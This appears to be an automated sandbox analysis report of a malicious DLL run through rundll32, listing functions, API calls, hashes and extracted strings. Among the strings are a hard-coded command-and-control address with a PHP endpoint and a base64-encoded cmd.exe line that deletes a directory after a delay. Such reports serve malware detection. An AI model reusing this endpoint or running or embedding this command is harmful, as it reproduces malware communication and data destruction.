                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B73,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10006ACB
                                                                                                                                                                            • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                          • Sleep.KERNEL32(0002BF20), ref: 10006B00
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,10006890,00000000,00000000,00000000), ref: 10006B14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                                                          • String ID: 0x5d65r455f$5762479093
                                                                                                                                                                          • API String ID: 3244495550-2446933972
                                                                                                                                                                          • Opcode ID: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
                                                                                                                                                                          • Instruction ID: 4f67e99d50a46098441a250a8f858ff8eaba0e926cf0b864be99c43c72b3ca27
                                                                                                                                                                          • Opcode Fuzzy Hash: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
                                                                                                                                                                          • Instruction Fuzzy Hash: F7014CB69443587AF210E3716CC6DFB3A4CDF953E0F240535FA15950CBDA24AC1581B2
                                                                                                                                                                          Function 1000C3BD Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 466COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                          • API String ID: 0-1626504983
                                                                                                                                                                          • Opcode ID: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
                                                                                                                                                                          • Instruction ID: d03cd593b305998a047facd2d6d5b23892ca1700a5cf5fa6db110c2fb33c411d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
                                                                                                                                                                          • Instruction Fuzzy Hash: B902B075A0478D9BEB21CF64C884F9EBBF9EF04380F1044AEE44997246DB70AA84CB55
                                                                                                                                                                          Function 10004139 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 130libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: %s%s$cmd.exe$log.txt
                                                                                                                                                                          • API String ID: 2994545307-357432712
                                                                                                                                                                          • Opcode ID: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
                                                                                                                                                                          • Instruction ID: 42687b898050392b2aa34869ec4325c4612b7f7ca25810209864e9fbe1877dbd
                                                                                                                                                                          • Opcode Fuzzy Hash: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
                                                                                                                                                                          • Instruction Fuzzy Hash: A841DAB690435CBEEB11DAA4CC85EDF77ACEF04384F1045A6F708E7091DA34AE848B60
                                                                                                                                                                          Function 10005D09 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$http://$search
                                                                                                                                                                          • API String ID: 1721638100-482061809
                                                                                                                                                                          • Opcode ID: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction ID: 870dc5a9e8937f5dec60cb765e1a8b9b6c263c42da1418f367658ae9c7f1e2c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 491106769081197BFB61DAA4CC42FDB776CDB043D5F0045B2FB44A5091EA72EFC48660
                                                                                                                                                                          Function 100080A9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                                                          • API String ID: 3472027048-2873435839
                                                                                                                                                                          • Opcode ID: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction ID: 06cf6e753789beb41ee34e7b66c8b6e5b7de97640241e5e5236da3cdb21958a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2831867790425D6EEB11D7B4DC41BDA7B7CFF18350F5404E6E248E6182EB719B988B10
                                                                                                                                                                          Function 1002B195 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • SeDebugPrivilege, xrefs: 10034413
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3347928522
                                                                                                                                                                          • Opcode ID: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction ID: eef6782f7c8bf8d562aff317d79cc2e303554eab770f54d6d404826304d9c596
                                                                                                                                                                          • Opcode Fuzzy Hash: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction Fuzzy Hash: C611E3B4004245BFE702DF10DC81AAE7BA8FF44384F40886DF6856A241CBB1AAD48B56
                                                                                                                                                                          Function 10007A85 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: $p=Vu
                                                                                                                                                                          • API String ID: 1927566239-153977967
                                                                                                                                                                          • Opcode ID: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction ID: eb1a3d92cece7d0a5f388039fb4e2ce0f3b3243cd5656f56a25f0c556dfa24ec
                                                                                                                                                                          • Opcode Fuzzy Hash: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction Fuzzy Hash: A7418375D0025A9BEF04DFA4C984AEEB7F8FF04284F10456EE90AA3245DB38AE04C761
                                                                                                                                                                          Function 10005C5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$http://
                                                                                                                                                                          • API String ID: 1721638100-679094439
                                                                                                                                                                          • Opcode ID: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction ID: 57a004b8a41de6ea14946d18f863adaefc4c4a039aa1cd5e98ec9af79828a04e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: FF11047690411C7EFB21DAA4CC42FDB7B6CDB04398F0045B1FB44B6081EA71AF844660